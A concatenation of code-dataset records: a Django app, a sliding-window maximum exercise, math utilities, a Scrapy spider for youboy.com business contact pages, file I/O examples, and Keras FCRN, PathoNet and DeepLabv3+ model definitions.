'lawrence':lawrence}\n\n\treturn render(request, 'Titikpoetry2.html', context)\n\ndef person(request, pk_test):\n\tperson = Recruit.objects.get(id=pk_test)\n\tacey = person.tula_set.all()\n\n\n\tcontext = {'person':person, 'acey':acey}\n\treturn render(request, 'person.html',context)\n\n\n\n\n\n\ndef updateTula(request, pk):\n\n\tjenjie = Tula.objects.get(id=pk)\n\tform = TulaForm(instance=jenjie)\n\n\tif request.method == 'POST':\n\t\tform = TulaForm(request.POST, instance=jenjie)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/')\n\n\tcontext = {'form':form}\n\treturn render(request, 'update.html', context)\n\ndef deleteTula(request, pk):\n\tjenjie = Tula.objects.get(id=pk)\n\tif request.method == \"POST\":\n\t\tjenjie.delete()\n\t\treturn redirect('/')\n\n\tcontext = {'item':jenjie}\n\treturn render(request, 'delete.html', context)\n","sub_path":"TitikPoetryApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406874697","text":"# python3\nclass Queue:\n def __init__(self,K):\n self.pushStack = []\n self.popStack = []\n self.K = K\n\n def enqueue(self,value):\n if(len(self.pushStack)==0):\n self.pushStack.append([value,value])\n elif(len(self.pushStack)>0 and not self.isFull()):\n if(value>=self.pushStack[-1][1]):\n self.pushStack.append([value,value])\n else:\n self.pushStack.append([value,self.pushStack[-1][1]])\n\n if(self.isFull()):\n while(len(self.pushStack)>0):\n val = self.pushStack.pop()\n if(len(self.popStack)==0):\n element = [val[0],val[0]]\n self.popStack.append(element)\n else:\n element = (val[0],max(val[0],self.popStack[-1][1]))\n self.popStack.append(element)\n\n\n def dequeue(self):\n if(len(self.pushStack)>0 and len(self.popStack)>0):\n val = self.popStack.pop()\n return max(self.pushStack[-1][1],val[1])\n elif(len(self.pushStack)==0):\n return self.popStack.pop()[1]\n\n def isFull(self):\n if(len(self.pushStack)==self.K):\n return True\n return False\n\n\n\ndef max_sliding_window_naive(sequence, m):\n queue = Queue(m)\n maximums = []\n for a in range(m):\n queue.enqueue(sequence[a])\n for i in range(m,len(sequence)+1):\n maximum = queue.dequeue()\n maximums.append(maximum)\n if(i>1:\n num>>=1\n tmp.append(num)\n if num!=1 and num&1:\n tmp.append(num*3+1)\n return hailstone(3*num+1,tmp)\n return tmp,len(tmp)\n\ndef hailstone2(num):\n result=[]\n while num!=1:\n if num&1:\n num=num*3+1\n result.append(num)\n else:\n num>>=1\n result.append(num)\n return result,len(result)\n\n# 2 最大公约数 50 70 50 20 50 10\ndef divisorMax(a,b):\n if a>b:\n a,b=b,a\n flag=b%a\n return divisorMax(a,flag) if flag else a\n\n# 最小公倍数 6 8 2 24\ndef multipleMin(a,b):\n return a*b//divisorMax(a,b)\n# 求三个数的最大公约数\ndef gcd(a,b,c):\n tmp1=divisorMax(a,b)\n return divisorMax(tmp1,c)\n\ndef lcm(a,b,c):\n return multipleMin(multipleMin(a,b),c)\nif __name__ == \"__main__\":\n # print(hailstone(43))\n # print(hailstone2(43))\n \n # print(max(a))\n \n # print(reduce(lambda x,y:x if x>y else y,a)) # 求数组最大值\n\n print(divisorMax(1997,615))\n print(multipleMin(36,50))\n print(gcd(2,7,6))\n print(lcm(2,7,6))","sub_path":"18.algorithm/13.mathDemo.py","file_name":"13.mathDemo.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"69158847","text":"from django.conf.urls import url,include\n\nfrom .views import UserinfoView,UploadImageView,UpdatePwdView,SendEmailCodeView,\\\n 
UpdateEmailView,MyCourseView,MyFavOrgView,MyFavTeacherView,MyFavCoureseView,MymessageView\n\nurlpatterns = [\n # User info\n url(r'^info/$',UserinfoView.as_view(),name='user_info'),\n\n # Upload user avatar\n url(r'^image/upload/$',UploadImageView.as_view(),name='image_upload'),\n\n # Change password from the user center\n url(r'^update/pwd/$',UpdatePwdView.as_view(),name='update_pwd'),\n\n # Send email verification code\n url(r'^sendemail_code/$',SendEmailCodeView.as_view(),name='sendemail_code'),\n\n # Change email address\n url(r'^update_email/$',UpdateEmailView.as_view(),name='update_email'),\n # My courses\n url(r'^mycourse/$',MyCourseView.as_view(),name='mycourse'),\n # My favorite course organizations\n url(r'^myfav/org/$',MyFavOrgView.as_view(),name='mayfav_org'),\n # My favorite teachers\n url(r'^myfav/teacher/$',MyFavTeacherView.as_view(),name='mayfav_teacher'),\n # My favorite courses\n url(r'^myfav/course/$',MyFavCoureseView.as_view(),name='mayfav_course'),\n # My messages\n url(r'^mymessage/$',MymessageView.as_view(),name='mymessage'),\n]\n\n\n\n","sub_path":"apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423301557","text":"# -*- coding: utf-8 -*-\nimport copy\nimport scrapy\nfrom youboy.items import YouboyItem\n\nclass YSpider(scrapy.Spider):\n name = 'y'\n # allowed_domains = ['youboy.com']\n # start_urls = ['http://youboy.com/']\n start_urls = [\"http://www.youboy.com/\"]\n base_url = 'http://www.youboy.com'\n # This is a dynamic domain\n def __init__(self, *args, **kwargs):\n # Dynamically define the allowed domains list.\n domain = kwargs.pop('domain', '')\n self.allowed_domains = filter(None, domain.split(','))\n super(YSpider, self).__init__(*args, **kwargs)\n # Get all the top-level categories\n def parse(self,response):\n divs = response.xpath(\"//div[@class='col-xs-6']/div[@class='ui-index-classify-list']\")\n for div in divs:\n for a in div.xpath(\"./ul/li/a\"):\n item = YouboyItem()\n tag = a.xpath(\"./text()\").extract_first()\n print(tag)\n item['tag'] = tag\n link = self.base_url + a.xpath(\"./@href\").extract_first()\n yield scrapy.Request(link,callback=self.parse_page,meta={'item': item}, dont_filter=True)\n # Parse the page and follow pagination\n def parse_page(self, response):\n # print(response.url)\n item = response.meta['item']\n names = response.xpath(\"//div[@class='searchPdListConLItem']\")\n for name in names:\n link=name.xpath(\".//div[@class='pdListTitle']/p/a/@href\").extract_first() + \"contact.html\"\n print(link)\n yield scrapy.Request(link,callback=self.parse_shop, meta={'item': item},dont_filter=True)\n next_page = response.xpath(\"//div[@class='searchPages']/span/a[@class='next']/@href\")\n if next_page:\n yield scrapy.Request(next_page.extract_first(),callback=self.parse_page, meta={'item': item},dont_filter=True)\n # Get the data from the detail page\n # There are several page formats here, which is a pain; if more turn up, write them all as functions in one file\n def parse_shop(self,response):\n if response.text:\n item = response.meta['item']\n name = response.xpath(\"//div[@class='lianxi_wrap']/div[@class='lianxi']/p[1]/font/text()\")\n if name:\n name= response.xpath(\"//div[@class='lianxi_wrap']/div[@class='lianxi']/p[1]/font/text()\")\n name = name.extract_first() if len(name) >0 else None\n addr = response.xpath(\"//div[@class='lianxi_wrap']/div[@class='lianxi']/p[2]/i/text()\")\n addr = ''.join(addr.extract()) if len(addr) >0 else None\n div = response.xpath(\"//div[@class='lianxi_wrap']/div[3]/ul\")\n fa = div.xpath(\"./li[1]/text()\")\n fa = ''.join(fa.extract()).strip('\\n\\t ').strip('\\r\\n\\t ') if len(fa) >0 else None\n tel1 = div.xpath(\"./li[2]/text()\")\n tel1 = 
''.join(tel1.extract()).strip('\\r\\n\\t ').strip('\\t\\r\\n ') if len(tel1) >0 else None\n tel2 = div.xpath(\"./li[3]/text()\")\n tel2 = ''.join(tel2.extract()).strip('\\n\\t ').strip('\\t\\r\\n\\t ') if len(tel2) >0 else None\n email = div.xpath(\"./li[5]/text()\")\n email = ''.join(email.extract()).strip('\\n\\t ').strip('\\r\\n\\t ') if len(email) >0 else None\n link = response.url\n elif response.xpath(\"//div[@class='contactCard']//tbody\"):\n trs = response.xpath(\"//div[@class='contactCard']//tbody\")[0]\n name = trs.xpath(\"./tr[1]/td[@class='nameTit01']/text()\")\n name = name.extract_first() if len(name) else None\n addr = trs.xpath(\"./tr[2]/td/i/text()\")\n addr = ''.join(addr.extract()) if len(addr) else None\n fa = trs.xpath(\"./tr[3]/td[2]/text()\")\n fa = fa.extract_first() if len(fa) else None\n tel1 = trs.xpath(\"./tr[3]/td[4]/text()\")\n tel1 = tel1.extract_first() if len(tel1) else None\n tel2 = trs.xpath(\"./tr[3]/td[6]/text()\")\n tel2 = tel2.extract_first() if len(tel2) else None\n email = trs.xpath(\"./tr[4]/td[4]/text()\")\n email = email.extract_first() if len(email) else None\n link = response.url\n elif response.xpath(\"//div[@class='lxcon']/ul\"):\n div = response.xpath(\"//div[@class='lxcon']/ul\")[0]\n name = div.xpath(\"./li[1]/b/font/text()\")\n name = name.extract_first() if len(name) else None\n addr = div.xpath(\"./li[2]/i//text()\")\n addr = ''.join(addr.extract()) if len(addr) else None\n fa = div.xpath(\"./li[3]/text()\")\n fa = fa.extract() if len(fa) else None\n tel1 = div.xpath(\"./li[5]/text()\")\n tel1 = tel1.extract() if len(tel1) else None\n tel2 = div.xpath(\"./li[6]/text()\")\n tel2 = tel2.extract() if len(tel2) else None\n email = div.xpath(\"./li[9]/a/text()\")\n email = email.extract() if len(email) else None\n link = response.url\n elif response.xpath(\"//tbody/tr/td[1]/strong/text()\"):\n name = response.xpath(\"//tbody/tr/td[1]/strong/text()\")\n name = name.extract_first() if len(name) else None\n addr = response.xpath(\"//tbody/tr/td[1]/p/text()[1]\")\n addr = ''.join(addr.extract()) if len(addr) else None\n fa = response.xpath(\"//tbody/tr/td[1]/p/text()[3]\")\n fa = fa.extract_first() if len(fa) else None\n tel1 = response.xpath(\"//tbody/tr/td[1]/p/text()[4]\")\n tel1 = tel1.extract_first() if len(tel1) else None\n tel2 = response.xpath(\"//tbody/tr/td[1]/p/text()[5]\")\n tel2 = tel2.extract_first() if len(tel2) else None\n email = response.xpath(\"//tbody/tr/td[1]/p/text()[7]\")\n email = email.extract_first() if len(email) else None\n link = response.url\n else:\n div = response.xpath(\"//div[@class='contactCard']/div/ul\")[0]\n name = div.xpath(\"./li[1]/strong/text()\")\n name = name.extract_first() if len(name) > 0 else None\n addr = div.xpath(\"./li[2]/span//text()\")\n addr = ''.join(addr.extract()) if len(addr) > 0 else None\n fa = div.xpath(\"./li[3]/span/text()\")\n fa = fa.extract_first() if len(fa) > 0 else None\n tel1 = div.xpath(\"./li[4]/span/text()\")\n tel1 = tel1.extract_first() if len(tel1) > 0 else None\n tel2 = div.xpath(\"./li[5]/span/text()\")\n tel2 = tel2.extract_first() if len(tel2) > 0 else None\n email = div.xpath(\"./li[7]/span/text()\")\n email = email.extract_first() if len(email) > 0 else None\n link = response.url\n\n item['name'] = name\n item['addr'] = addr\n item['fa'] = fa\n item['tel1'] = tel1\n item['tel2'] = tel2\n item['email'] = email\n item['link'] = link\n print(item)\n yield 
item\n\n\n\n\n","sub_path":"youboy/spiders/y.py","file_name":"y.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420778387","text":"# Use open to open file \"foo.txt\" for reading\nf = open('foo.txt', \"r\")\n# Print all the lines in the file\nlines = f.readlines()\nprint(lines)\n# Close the file\nf.close()\n\n\n# # Use open to open file \"bar.txt\" for writing\n# f = open('bar.txt', 'w')\n\n# # Use the write() method to write three lines to the file\n# f.write(\"\"\"line 1\n# line2\n# line 3\"\"\")\n\n# # Close the file\n# f.close()","sub_path":"src/day-1-toy/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"434439757","text":"#open 函数\nfo = open(\"foo.txt\", \"wb\")\n\n#write()方法\nfo.write(bytes(\"www.runoob.com!\\nVery good site!\\n\", 'utf-8'))\n\n#close()方法\nfo.close()\n\n#\nfo = open(\"foo.txt\", \"r+\")\n\n#read()方法\nstr = fo.read(20);\n\nprint (\"读取的字符串是 : \", str)\n\nfo.close()\n\nposition = fo.tell();\nprint (\"当前文件位置 : \", position)","sub_path":"IO/File_1.py","file_name":"File_1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442743689","text":"from django.shortcuts import render\nfrom posts.models import Post\n# Create your views here.\n\ndef home_view(request):\n tags = Post.tag.all()\n lenTags = int(len(tags)/2)\n tags_1st = tags[:lenTags]\n tags_2nd = tags[lenTags:]\n print(lenTags)\n\n context={\n 'tags_1st': tags_1st,\n 'tags_2nd': tags_2nd\n }\n\n return render(request, 'posts/home.html', context)","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"119312493","text":"import numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.layers import (Input,Add,add,concatenate,Activation,concatenate,\n Concatenate,Dropout,BatchNormalization,Reshape,Permute,\n Dense,UpSampling2D,Flatten,Lambda,Activation,Conv2D,\n DepthwiseConv2D,ZeroPadding2D,GlobalAveragePooling2D,\n MaxPooling2D,AveragePooling2D,LeakyReLU,Conv2DTranspose)\n \nfrom keras.regularizers import l2\nfrom keras.utils.layer_utils import get_source_inputs\nfrom keras.utils.data_utils import get_file\nfrom keras.activations import relu\nfrom keras.optimizers import SGD, Adam\n\n\nWEIGHTS_PATH_X = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.1/deeplabv3_xception_tf_dim_ordering_tf_kernels.h5\"\nWEIGHTS_PATH_MOBILE = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.1/deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels.h5\"\nWEIGHTS_PATH_X_CS = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.2/deeplabv3_xception_tf_dim_ordering_tf_kernels_cityscapes.h5\"\nWEIGHTS_PATH_MOBILE_CS = \"https://github.com/bonlime/keras-deeplab-v3-plus/releases/download/1.2/deeplabv3_mobilenetv2_tf_dim_ordering_tf_kernels_cityscapes.h5\"\nweight_decay = 1e-5\n\n\ndef SepConv_BN(x, filters, prefix, stride=1, kernel_size=3, rate=1, depth_activation=False, epsilon=1e-3):\n \"\"\" SepConv with BN between depthwise & pointwise. 
Optionally add activation after BN\n Implements right \"same\" padding for even kernel sizes\n Args:\n x: input tensor\n filters: num of filters in pointwise convolution\n prefix: prefix before name\n stride: stride at depthwise conv\n kernel_size: kernel size for depthwise convolution\n rate: atrous rate for depthwise convolution\n depth_activation: flag to use activation between depthwise & poinwise convs\n epsilon: epsilon to use in BN layer\n \"\"\"\n\n if stride == 1:\n depth_padding = 'same'\n else:\n kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n x = ZeroPadding2D((pad_beg, pad_end))(x)\n depth_padding = 'valid'\n\n if not depth_activation:\n x = Activation('relu')(x)\n x = DepthwiseConv2D((kernel_size, kernel_size), strides=(stride, stride), dilation_rate=(rate, rate),\n padding=depth_padding, use_bias=False, name=prefix + '_depthwise')(x)\n x = BatchNormalization(name=prefix + '_depthwise_BN', epsilon=epsilon)(x)\n if depth_activation:\n x = Activation('relu')(x)\n x = Conv2D(filters, (1, 1), padding='same',\n use_bias=False, name=prefix + '_pointwise')(x)\n x = BatchNormalization(name=prefix + '_pointwise_BN', epsilon=epsilon)(x)\n if depth_activation:\n x = Activation('relu')(x)\n\n return x\n\n\ndef _conv2d_same(x, filters, prefix, stride=1, kernel_size=3, rate=1):\n \"\"\"Implements right 'same' padding for even kernel sizes\n Without this there is a 1 pixel drift when stride = 2\n Args:\n x: input tensor\n filters: num of filters in pointwise convolution\n prefix: prefix before name\n stride: stride at depthwise conv\n kernel_size: kernel size for depthwise convolution\n rate: atrous rate for depthwise convolution\n \"\"\"\n if stride == 1:\n return Conv2D(filters,\n (kernel_size, kernel_size),\n strides=(stride, stride),\n padding='same', use_bias=False,\n dilation_rate=(rate, rate),\n name=prefix)(x)\n else:\n kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n x = ZeroPadding2D((pad_beg, pad_end))(x)\n return Conv2D(filters,\n (kernel_size, kernel_size),\n strides=(stride, stride),\n padding='valid', use_bias=False,\n dilation_rate=(rate, rate),\n name=prefix)(x)\n\n\ndef _xception_block(inputs, depth_list, prefix, skip_connection_type, stride,\n rate=1, depth_activation=False, return_skip=False):\n \"\"\" Basic building block of modified Xception network\n Args:\n inputs: input tensor\n depth_list: number of filters in each SepConv layer. 
len(depth_list) == 3\n prefix: prefix before name\n skip_connection_type: one of {'conv','sum','none'}\n stride: stride at last depthwise conv\n rate: atrous rate for depthwise convolution\n depth_activation: flag to use activation between depthwise & pointwise convs\n return_skip: flag to return additional tensor after 2 SepConvs for decoder\n \"\"\"\n residual = inputs\n for i in range(3):\n residual = SepConv_BN(residual,\n depth_list[i],\n prefix + '_separable_conv{}'.format(i + 1),\n stride=stride if i == 2 else 1,\n rate=rate,\n depth_activation=depth_activation)\n if i == 1:\n skip = residual\n if skip_connection_type == 'conv':\n shortcut = _conv2d_same(inputs, depth_list[-1], prefix + '_shortcut',\n kernel_size=1,\n stride=stride)\n shortcut = BatchNormalization(name=prefix + '_shortcut_BN')(shortcut)\n outputs = add([residual, shortcut])\n elif skip_connection_type == 'sum':\n outputs = add([residual, inputs])\n elif skip_connection_type == 'none':\n outputs = residual\n if return_skip:\n return outputs, skip\n else:\n return outputs\n\n\ndef relu6(x):\n return relu(x, max_value=6)\n\n\ndef _make_divisible(v, divisor, min_value=None):\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\ndef _inverted_res_block(inputs, expansion, stride, alpha, filters, block_id, skip_connection, rate=1):\n in_channels = inputs.shape[-1] # inputs._keras_shape[-1]\n pointwise_conv_filters = int(filters * alpha)\n pointwise_filters = _make_divisible(pointwise_conv_filters, 8)\n x = inputs\n prefix = 'expanded_conv_{}_'.format(block_id)\n if block_id:\n # Expand\n print(\"=========>>>>>>\",expansion * in_channels)\n x = Conv2D(int(expansion * in_channels), kernel_size=1, padding='same',\n use_bias=False, activation=None,name=prefix + 'expand')(x)\n x = BatchNormalization(epsilon=1e-3, momentum=0.999,\n name=prefix + 'expand_BN')(x)\n x = Activation(relu6, name=prefix + 'expand_relu')(x)\n else:\n prefix = 'expanded_conv_'\n # Depthwise\n x = DepthwiseConv2D(kernel_size=3, strides=stride, activation=None,\n use_bias=False, padding='same', dilation_rate=(rate, rate),\n name=prefix + 'depthwise')(x)\n x = BatchNormalization(epsilon=1e-3, momentum=0.999,\n name=prefix + 'depthwise_BN')(x)\n\n x = Activation(relu6, name=prefix + 'depthwise_relu')(x)\n\n # Project\n x = Conv2D(pointwise_filters,\n kernel_size=1, padding='same', use_bias=False, activation=None,\n name=prefix + 'project')(x)\n x = BatchNormalization(epsilon=1e-3, momentum=0.999,\n name=prefix + 'project_BN')(x)\n\n if skip_connection:\n return Add(name=prefix + 'add')([inputs, x])\n\n # if in_channels == pointwise_filters and stride == 1:\n # return Add(name='res_connect_' + str(block_id))([inputs, x])\n\n return x\n\ndef residualDilatedInceptionModule(y, nb_channels, _strides=(1, 1),t=\"e\"):\n if t==\"d\":\n y = Conv2D(nb_channels, kernel_size=(1, 1), strides=(1, 1),kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), padding='same', use_bias=False)(y)\n y = BatchNormalization()(y)\n y = LeakyReLU()(y)\n y = Conv2D(nb_channels, kernel_size=(1, 1), strides=(1, 1),kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), padding='same', use_bias=False)(y)\n y = BatchNormalization()(y)\n y = LeakyReLU()(y)\n\n\n A1 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), 
padding='same', use_bias=False)(y)\n A1 = BatchNormalization()(A1)\n A1 = LeakyReLU()(A1)\n A1 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), padding='same', use_bias=False)(A1)\n A1 = BatchNormalization()(A1)\n A1 = LeakyReLU()(A1)\n\n\n A4 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), dilation_rate=4, padding='same', use_bias=False)(y)\n A4 = BatchNormalization()(A4)\n A4 = LeakyReLU()(A4)\n A4 = Conv2D(nb_channels, kernel_size=(3, 3), strides=_strides,kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), dilation_rate=4, padding='same', use_bias=False)(A4)\n A4 = BatchNormalization()(A4)\n A4 = LeakyReLU()(A4)\n\n if (t==\"e\"):\n y=concatenate([y,y])\n y=add([A1,A4,y])\n y = BatchNormalization()(y)\n y = LeakyReLU()(y)\n\n return y\n\ndef _conv_bn_relu(nb_filter, row, col, subsample = (1,1)):\n def f(input):\n conv_a = Conv2D(nb_filter, (row, col), strides = subsample,\n kernel_initializer = 'orthogonal', \n padding='same', use_bias = False)(input)\n \n norm_a = BatchNormalization()(conv_a)\n act_a = Activation(activation = 'relu')(norm_a)\n return act_a\n return f\n\n\n\ndef _conv_bn_relu_x2(nb_filter, row, col, subsample = (1,1)):\n def f(input):\n conv_a = Conv2D(nb_filter, (row, col), strides = subsample,\n kernel_initializer = 'orthogonal', padding = 'same',use_bias = False,\n kernel_regularizer = l2(weight_decay),\n bias_regularizer = l2(weight_decay))(input)\n norm_a = BatchNormalization()(conv_a)\n act_a = Activation(activation = 'relu')(norm_a)\n conv_b = Conv2D(nb_filter, (row, col), strides = subsample,\n kernel_initializer = 'orthogonal', padding = 'same',use_bias = False,\n kernel_regularizer = l2(weight_decay),\n bias_regularizer = l2(weight_decay))(act_a)\n norm_b = BatchNormalization()(conv_b)\n act_b = Activation(activation = 'relu')(norm_b)\n return act_b\n return f\n\ndef FCRN_A(input_dim, classes=3, pretrained_weights = None):\n input_ = Input (shape = (input_dim))\n\n block1 = Conv2D(32, (3, 3),kernel_initializer = 'orthogonal', padding='same')(input_)\n act1 = Activation(activation = 'relu')(block1)\n pool1 = MaxPooling2D(pool_size=(2,2))(act1)\n\n block2 = Conv2D(64, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool1)\n act2 = Activation(activation = 'relu')(block2)\n pool2 = MaxPooling2D(pool_size=(2,2))(act2)\n\n block3 = Conv2D(128, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool2)\n act3 = Activation(activation = 'relu')(block3)\n pool3 = MaxPooling2D(pool_size=(2,2))(act3)\n\n block4 = Conv2D(512, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool3)\n act4 = Activation(activation = 'relu')(block4)\n\n up5=UpSampling2D(size = (2,2))(act4)\n act5 = Activation(activation = 'relu')(up5)\n block5 = Conv2D(128, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act5)\n\n up6=UpSampling2D(size = (2,2))(block5)\n act6 = Activation(activation = 'relu')(up6)\n block6 = Conv2D(64, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act6)\n\n up7=UpSampling2D(size = (2,2))(block6)\n act7 = Activation(activation = 'relu')(up7)\n block7 = Conv2D(32, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act7)\n\n density_pred = Conv2D(classes, (1, 1), use_bias = False, activation='linear',kernel_initializer='orthogonal',name='pred',padding='same')(block7)\n\n model = Model (inputs = input_, outputs = density_pred)\n\n model.summary()\n\n if(pretrained_weights):\n 
model.load_weights(pretrained_weights)\n return model\n\ndef FCRN_B(input_dim, classes=3, pretrained_weights = None):\n input_ = Input (shape = (input_dim))\n\n block1 = Conv2D(32, (3, 3),kernel_initializer = 'orthogonal', padding='same')(input_)\n act1 = Activation(activation = 'relu')(block1)\n pool1 = MaxPooling2D(pool_size=(2,2))(act1)\n\n block2 = Conv2D(64, (3, 3),kernel_initializer = 'orthogonal', padding='same')(pool1)\n act2 = Activation(activation = 'relu')(block2)\n\n block3 = Conv2D(128, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act2)\n act3 = Activation(activation = 'relu')(block3)\n pool3 = MaxPooling2D(pool_size=(2,2))(act3)\n\n block4 = Conv2D(256, (5, 5),kernel_initializer = 'orthogonal', padding='same')(pool3)\n act4 = Activation(activation = 'relu')(block4)\n\n block5 = Conv2D(256, (3, 3),kernel_initializer = 'orthogonal', padding='same')(act4)\n act5 = Activation(activation = 'relu')(block5)\n\n up6=UpSampling2D(size = (2,2))(act5)\n act6 = Activation(activation = 'relu')(up6)\n block6 = Conv2D(256, (5, 5),kernel_initializer = 'orthogonal', padding='same')(act6)\n\n up7=UpSampling2D(size = (2,2))(block6)\n act7 = Activation(activation = 'relu')(up7)\n density_pred = Conv2D(classes, 1, 1, bias = False, activation='linear',init='orthogonal',name='pred',border_mode='same')(act7)\n model = Model (input = input_, output = density_pred)\n\n model.summary()\n\n if(pretrained_weights):\n model.load_weights(pretrained_weights)\n return model\n\ndef PathoNet(input_size = (256,256,3), classes=3, pretrained_weights = None):\n inputs = Input(input_size) \n\n block1= Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(inputs)\n block1 = BatchNormalization()(block1)\n block1 = LeakyReLU()(block1)\n block1= Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(block1)\n block1 = BatchNormalization()(block1)\n block1 = LeakyReLU()(block1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(block1)\n\n block2= residualDilatedInceptionModule(pool1,32,t=\"e\")\n pool2 = MaxPooling2D(pool_size=(2, 2))(block2)\n\n block3= residualDilatedInceptionModule(pool2,64,t=\"e\")\n pool3 = MaxPooling2D(pool_size=(2, 2))(block3)\n\n block4= residualDilatedInceptionModule(pool3,128,t=\"e\")\n pool4 = MaxPooling2D(pool_size=(2, 2))(block4)\n drop4 = Dropout(0.1)(pool4)\n\n block5= residualDilatedInceptionModule(drop4,256,t=\"e\")\n drop5 = Dropout(0.1)(block5)\n\n up6 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(drop5)),128,t=\"d\")\n merge6 = concatenate([block4,up6], axis = 3)\n\n up7 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(merge6)),64,t=\"d\")\n merge7 = concatenate([block3,up7], axis = 3)\n\n up8 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(merge7)),32,t=\"d\")\n merge8 = concatenate([block2,up8], axis = 3)\n\n up9 = residualDilatedInceptionModule((UpSampling2D(size = (2,2))(merge8)),16,t=\"d\")\n merge9 = concatenate([block1,up9], axis = 3)\n\n block9=Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(merge9)\n block9 = BatchNormalization()(block9)\n block9 = LeakyReLU()(block9)\n block9=Conv2D(16, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= l2(5e-4), use_bias=False)(block9)\n block9 = BatchNormalization()(block9)\n block9 = LeakyReLU()(block9)\n block9=Conv2D(8, 3, padding = 'same', kernel_initializer = 'orthogonal',kernel_regularizer= 
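`FCRN_B` pools twice where `FCRN_A` pools three times, and each network mirrors its pooling count with the same number of `UpSampling2D` layers — that balance is what keeps the predicted density map at input resolution. A tiny arithmetic check of that invariant:

```python
def output_size(input_size, n_pool, n_upsample):
    # Each MaxPooling2D(2,2) halves the spatial size, each
    # UpSampling2D(2,2) doubles it.
    size = input_size
    for _ in range(n_pool):
        size //= 2
    for _ in range(n_upsample):
        size *= 2
    return size

assert output_size(256, 3, 3) == 256  # FCRN_A: three pools, three upsamples
assert output_size(256, 2, 2) == 256  # FCRN_B: two pools, two upsamples
```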
l2(5e-4), use_bias=False)(block9)\n block9 = BatchNormalization()(block9)\n block9 = LeakyReLU()(block9)\n conv10 = Conv2D(classes, 1, activation = 'relu')(block9)\n\n model = Model(input = inputs, output = conv10)\n\n \n model.summary()\n\n if(pretrained_weights):\n model.load_weights(pretrained_weights)\n return model\n\ndef Deeplabv3(weights=None, input_tensor=None, input_shape=(256, 256, 3), classes=3, backbone='mobilenetv2',\n OS=16, alpha=1., activation=None):\n \"\"\" Instantiates the Deeplabv3+ architecture\n Optionally loads weights pre-trained\n on PASCAL VOC or Cityscapes. This model is available for TensorFlow only.\n # Arguments\n weights: one of 'pascal_voc' (pre-trained on pascal voc),\n 'cityscapes' (pre-trained on cityscape) or None (random initialization)\n input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)\n to use as image input for the model.\n input_shape: shape of input image. format HxWxC\n PASCAL VOC model was trained on (512,512,3) images. None is allowed as shape/width\n classes: number of desired classes. PASCAL VOC has 21 classes, Cityscapes has 19 classes.\n If number of classes not aligned with the weights used, last layer is initialized randomly\n backbone: backbone to use. one of {'xception','mobilenetv2'}\n activation: optional activation to add to the top of the network.\n One of 'softmax', 'sigmoid' or None\n OS: determines input_shape/feature_extractor_output ratio. One of {8,16}.\n Used only for xception backbone.\n alpha: controls the width of the MobileNetV2 network. This is known as the\n width multiplier in the MobileNetV2 paper.\n - If `alpha` < 1.0, proportionally decreases the number\n of filters in each layer.\n - If `alpha` > 1.0, proportionally increases the number\n of filters in each layer.\n - If `alpha` = 1, default number of filters from the paper\n are used at each layer.\n Used only for mobilenetv2 backbone. Pretrained is only available for 